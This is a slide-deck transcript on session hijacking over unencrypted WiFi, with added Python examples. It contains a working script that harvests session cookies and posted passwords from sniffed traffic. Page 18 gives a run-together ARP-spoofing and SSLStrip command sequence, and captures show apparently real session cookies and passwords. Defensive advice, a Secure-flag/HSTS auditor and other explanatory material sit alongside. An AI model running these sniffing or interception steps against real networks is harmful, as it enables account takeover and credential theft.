Session hijacking for dummies

Friedemann Wulff-Woesten, WDCM Dresden

Uploaded by eisenrah, 24 January 2015 (category: Technology)

TRANSCRIPT

Page 1: Session hijacking for dummies

Friedemann Wulff-Woesten, WDCM Dresden

Page 2: What is this all about?

• especially in the Czech Republic: unencrypted WiFi everywhere
• Facebook is for many people THE platform to communicate
• many mobile devices have Facebook apps: even more data, even more possibilities to attack
• problem: almost no one types https://, so the browser always connects to port 80 first

Page 3: What is this all about?

• this is a serious security threat
• tools are freely available, and no one cares
• Facebook ignores the problem (logins and session cookies still travel over plain HTTP, see the captures below)
• Google went full SSL

Page 4: HTTP is stateless

• request, response: the server remembers nothing between the two
• send username/password once
• receive a cookie (the session ID)
• use the cookie for all future requests: whoever presents it is "logged in"

Page 5: Cookies need to be kept secret

• the session cookie is the only thing the server uses to tell you apart from everyone else; whoever has it is you
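As an added example (not code from the talk), the four steps of pages 4 and 5 as a toy server-side session store in Python. The point it makes runnable: after login the server authenticates every request by the cookie alone, so the same token copied off the wire and presented from another machine is accepted as the victim, and only a server-side logout ends that. The username/password pair and the cookie name xs are taken from the captures later in the deck; everything else is assumed for the demo.

```python
import secrets
from typing import Optional

# Constructed toy: one user with a cleartext password (acceptable in a demo, never in production).
# The username/password pair is the one visible in the page-9 capture.
USERS = {"wdcmdd": "meinsogeheimespasswort"}


class SessionStore:
    """Server-side table of session token -> username, the thing behind Set-Cookie."""

    def __init__(self) -> None:
        self._sessions: dict = {}

    def login(self, username: str, password: str) -> Optional[str]:
        """Check the password once and hand back a fresh random token (the cookie value)."""
        if USERS.get(username) != password:
            return None
        token = secrets.token_hex(16)  # 128 random bits: not guessable, but trivially copyable
        self._sessions[token] = username
        return token

    def set_cookie_header(self, token: str, secure: bool) -> str:
        """The header the server would send; 'secure' is the flag the page-11 response lacks."""
        flags = "; Path=/; HttpOnly" + ("; Secure" if secure else "")
        return f"Set-Cookie: xs={token}{flags}"

    def whoami(self, cookie_header: str) -> Optional[str]:
        """Authenticate a later request by its Cookie header alone, as the server does."""
        for part in cookie_header.split(";"):
            name, _, value = part.strip().partition("=")
            if name == "xs":
                return self._sessions.get(value)
        return None

    def logout(self, token: str) -> None:
        """Invalidate server-side. Without this, 'Log out' only deletes the browser's copy."""
        self._sessions.pop(token, None)


def hijack_demo() -> tuple:
    """Victim logs in; whoever copied the cookie off the wire is the victim too;
    a server-side logout ends both sessions at once."""
    store = SessionStore()
    token = store.login("wdcmdd", "meinsogeheimespasswort")
    victim_cookie = f"xs={token}; locale=en_US"
    stolen_cookie = f"xs={token}"  # copied from a sniffed request, sent from another machine
    as_victim = store.whoami(victim_cookie)
    as_attacker = store.whoami(stolen_cookie)  # nothing ties the token to a particular client
    store.logout(token)
    after_logout = store.whoami(stolen_cookie)
    return as_victim, as_attacker, after_logout


if __name__ == "__main__":
    print(hijack_demo())  # ('wdcmdd', 'wdcmdd', None)
```

The token is random, so it cannot be guessed; the problem the talk is about is that it is a bearer credential, and a network that shows it to everyone hands out the login with it.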

Page 6: (image only)

Page 7: (image only)

Page 8: even better: WiFi

• cookies shouted through the air
• someone just has to start listening (on an open network every station can receive everyone else's frames)

Page 9: let's listen...

imac:~ eisenrah$ sudo tcpdump -A -v -i en1 tcp port 80
tcpdump: listening on en1, link-type EN10MB (Ethernet), capture size 65535 bytes
[...]
17:01:36.119066 IP (tos 0x0, ttl 64, id 45430, offset 0, flags [DF], proto TCP (6), length 102) imac.52070 > w9e.rzone.de.http: Flags [P.], cksum 0x3e95 (correct), seq 854:904, ack 1, win 33120, options [nop,nop,TS val 709324897 ecr 1167316720], length 50
[... raw IP/TCP header bytes ...]
username=wdcmdd&password=meinsogeheimespasswort
[...]

(-A prints each packet as ASCII; the login form fields are readable exactly as the browser sent them)

Page 10: Example: Request

POST /login.php?login_attempt=1 HTTP/1.1
Host: login.facebook.com

email=[...]&pass=ichmagdietu

Page 11: Example: Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/home.php?
Set-Cookie: xs=a1cac26e11645bca984ea98f98a6a19c; path=/; domain=.facebook.com; httponly

• note: the cookie is httponly but has no secure flag, so the browser will keep sending it over plain HTTP, and the redirect itself points at http://

Page 12: Problem: AJAX

• background requests (chat and presence polling) send the session cookie without the user clicking anywhere, so a sniffer gets it even from an idle browser tab

Page 13: tcpdump: В Контакте (VKontakte)

17:18:32.656064 IP (tos 0x0, ttl 64, id 7684, offset 0, flags [DF], proto TCP (6), length 674) imac.52256 > srv64-131.vkontakte.ru.http: Flags [P.], cksum 0x84a6 (correct), seq 930:1552, ack 743, win 65535, options [nop,nop,TS val 710338737 ecr 2377981922], length 622
[... raw IP/TCP header bytes ...]
POST /im915 HTTP/1.1
Host: q63.queue.vk.com
Connection: keep-alive
Referer: http://q63.queue.vk.com/q_frame.php?3
Content-Length: 307
Origin: http://q63.queue.vk.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: remixchk=5; remixlang=0; remixsid=2a72ff88d120569ae115f1e01885c5f14674dab175a1fb5392441d4e9840

Page 14: tcpdump: Facebook

21:39:06.513002 IP (tos 0x0, ttl 64, id 35287, offset 0, flags [DF], proto TCP (6), length 1306) imac.50781 > channel2-02-01-snc4.facebook.com.http: Flags [P.], cksum 0xca09 (correct), seq 1:1255, ack 263, win 32830, options [nop,nop,TS val 689948758 ecr 2100724491], length 1254
[... raw IP/TCP header bytes ...]
GET /x/4057007781/1328384618/true/p_100001070666929=23 HTTP/1.1
Host: 0.44.channel.facebook.com
Connection: keep-alive
Referer: http://0.44.channel.facebook.com/iframe/11?r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyX%2Fr%2Fimb8Z50C5TH.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyF%2Fr%2Fx3LLBUl8mEP.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyH%2Fr%2FwtfO3BqjZSC.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2Fyz%2Fr%2FhFfiXiUF_l3.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyE%2Fr%2FSp2IUK7A8Z2.js
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_user=100001070666929; datr=-J0UTvLh4Us6mmd4HoAFaYWl; L=2; lu=Rg43lZE4nMjM3vtnDl9S-BPw; sct=1312918035; xs=60%3A8a0d1e5b0344cca655fd1566026f513c; p=44; act=1312918349733%2F16; presence=EM312918690L44REp_5f1B01070666929F23X312918690038Y1312918638OQ0EsF0CEblFDacF19G312918689PEuoFD1B01609907228FDexpF1312918709806EflF_5b1_5dEolF0CE1B00195332181FDexpF13129187B69EflF_5b_5dEolF-1CCEalFD1B01609907228FDiF0EmF0CCCC; wd=840x952

• the session is carried by c_user (the user ID) and xs; this is a chat-channel poll sent in the background, no click needed
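The captures on pages 9 to 14 are read by eye; what a tool such as Firesheep automates is the parsing step. The added Python example below (not code from the talk or from Firesheep) does that over an ASCII dump: it cuts the text into HTTP requests, and for each one keeps the cookies that carry the session on that site (c_user and xs for facebook.com, remixsid for vk.com, as on the slides) and any login form posted in the clear. The sample capture is constructed for this example and every value in it is made up; the per-site cookie table is an assumption modeled on the captures above.

```python
import re
from urllib.parse import parse_qs

# Which cookies carry the session on which site, as seen in the captures on pages 11 to 14
# (Firesheep ships a "handler" like this per site). Hosts are matched by domain suffix.
SESSION_COOKIES = {
    "facebook.com": ("c_user", "xs"),
    "vk.com": ("remixsid",),
}

# Constructed sample modeled on the captures above; every value is made up.
SAMPLE_CAPTURE = """\
17:01:36.119066 IP imac.52070 > login.facebook.com.http: Flags [P.], length 50
POST /login.php?login_attempt=1 HTTP/1.1
Host: login.facebook.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

email=alice%40example.org&pass=ichmagdietu
GET /x/1234/5678/true/p_123456789=23 HTTP/1.1
Host: 0.44.channel.facebook.com
X-Requested-With: XMLHttpRequest
Cookie: c_user=123456789; datr=DUMMYdatr; xs=60%3Adeadbeef; wd=840x952

POST /im915 HTTP/1.1
Host: q63.queue.vk.com
Cookie: remixchk=5; remixlang=0; remixsid=cafebabe
Content-Length: 0

"""

REQUEST_LINE = re.compile(r"^(?:GET|POST) \S+ HTTP/1\.[01]$", re.M)


def split_requests(capture: str) -> list:
    """Cut an ASCII dump into HTTP requests; text before the first request line is ignored."""
    text = capture.replace("\r\n", "\n")
    starts = [m.start() for m in REQUEST_LINE.finditer(text)]
    ends = starts[1:] + [len(text)]
    return [text[s:e] for s, e in zip(starts, ends)]


def parse_request(raw: str) -> dict:
    """Method, path, host, the Cookie header as a dict, and the body of one request."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    cookies = {}
    for part in headers.get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return {"method": method, "path": path, "host": headers.get("host", ""),
            "cookies": cookies, "body": body.strip()}


def site_for(host: str):
    """Map a hostname such as 0.44.channel.facebook.com to its handler key, or None."""
    for site in SESSION_COOKIES:
        if host == site or host.endswith("." + site):
            return site
    return None


def harvest(capture: str) -> list:
    """What a passive sniffer keeps from a cleartext capture: session cookies and posted logins."""
    findings = []
    for raw in split_requests(capture):
        req = parse_request(raw)
        site = site_for(req["host"])
        if site:
            found = {n: req["cookies"][n] for n in SESSION_COOKIES[site] if n in req["cookies"]}
            if found:
                findings.append({"kind": "session", "site": site, "cookies": found})
        if req["method"] == "POST" and req["body"]:
            form = parse_qs(req["body"])
            creds = {k: v[0] for k, v in form.items()
                     if k in ("email", "username", "pass", "password")}
            if creds:
                findings.append({"kind": "credentials", "host": req["host"], "fields": creds})
    return findings


if __name__ == "__main__":
    for finding in harvest(SAMPLE_CAPTURE):
        print(finding)
```

Three findings come out of the sample: the posted e-mail and password, the facebook.com pair c_user/xs from the background poll, and the vk.com remixsid. Nothing here needs the victim to do anything; the poll request alone is enough.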

Page 15: facebook.js changes

Page 16: What can you do?

• always full SSL: type https:// in the address bar
• click "Log out" (doesn't guarantee the session is invalidated server-side)
• use at least WPA2 (caveat: on a network with a shared password, anyone who knows the password and captures your handshake can still decrypt your traffic, so this only keeps outsiders out)
• use a VPN, e.g. https://webvpn.zih.tu-dresden.de/
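The advice above is for the user; the fix belongs on the server. As an added example (not code from the talk), the Python below audits a login response for the three things that hand the session to a sniffer or to a downgrade attack: a session cookie without the Secure flag (the page-11 response), a redirect to http://, and no Strict-Transport-Security header (HSTS, which tells the browser never to speak plain HTTP to that host again). The weak response copies the structure of the page-11 response with the cookie value replaced by a dummy; the hardened one next to it is the assumed correct form.

```python
# Constructed responses for the audit. WEAK_RESPONSE mirrors the page-11 response
# (dummy cookie value); HARDENED_RESPONSE is the assumed fixed version.
WEAK_RESPONSE = """\
HTTP/1.1 302 Found
Location: http://www.facebook.com/home.php?
Set-Cookie: xs=0123456789abcdef0123456789abcdef; path=/; domain=.facebook.com; httponly

"""

HARDENED_RESPONSE = """\
HTTP/1.1 302 Found
Location: https://www.facebook.com/home.php
Set-Cookie: xs=0123456789abcdef0123456789abcdef; Path=/; Domain=.facebook.com; Secure; HttpOnly
Strict-Transport-Security: max-age=31536000; includeSubDomains

"""


def parse_response(raw: str) -> tuple:
    """Status line plus a list of (lower-cased name, value) pairs; repeated headers are kept."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.splitlines()
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def audit_cookie(set_cookie: str) -> list:
    """Flag a Set-Cookie value a browser would send over plain http:// or expose to script."""
    name = set_cookie.split("=", 1)[0].strip()
    attrs = {a.strip().split("=", 1)[0].lower() for a in set_cookie.split(";")[1:]}
    problems = []
    if "secure" not in attrs:
        problems.append(f"cookie {name}: no Secure flag, browser sends it over plain http:// too")
    if "httponly" not in attrs:
        problems.append(f"cookie {name}: no HttpOnly flag, readable from script")
    return problems


def audit_response(raw: str) -> list:
    """Every way this response hands the session to a sniffer or an sslstrip-style attacker."""
    _status, headers = parse_response(raw)
    problems = []
    for name, value in headers:
        if name == "set-cookie":
            problems.extend(audit_cookie(value))
    single = dict(headers)
    location = single.get("location", "")
    if location.startswith("http://"):
        problems.append(f"redirects to cleartext URL {location}")
    if "strict-transport-security" not in single:
        problems.append("no Strict-Transport-Security header, nothing stops a downgrade to http://")
    return problems


if __name__ == "__main__":
    for problem in audit_response(WEAK_RESPONSE):
        print("weak:", problem)
    print("hardened:", audit_response(HARDENED_RESPONSE))  # []
```

The Secure flag is also what defuses the Like-button case on the next page: a cookie marked Secure is never attached to a widget request from a plain-HTTP blog page, whatever the embedding site does.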

Page 17: Even worse

• Facebook Like buttons and Tweet buttons are embedded in many blogs; when the blog page is plain HTTP, the browser sends the facebook.com cookies with the button request over HTTP, even if you only ever use https:// on Facebook itself
• dirty: active attack with SSLStrip (sits in the middle, rewrites https:// links and redirects to http:// and talks HTTPS to the real site itself, so the victim never sees an encrypted connection); the server-side defence is HSTS (Strict-Transport-Security), which tells the browser never to talk plain HTTP to that host again

Page 18: Session hijacking for dummies

sudo -secho "1" > /proc/sys/net/ipv4/ip_forwardiptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000

sslstrip -l 1000ip route show | grep default | awk '{ print $3}'arpspoof <gatewayIP>ettercap -Tzq

18

Example: SSLStrip

Page 20: (credits)

@cdine, @codebutler, @eisenrah, @moxie__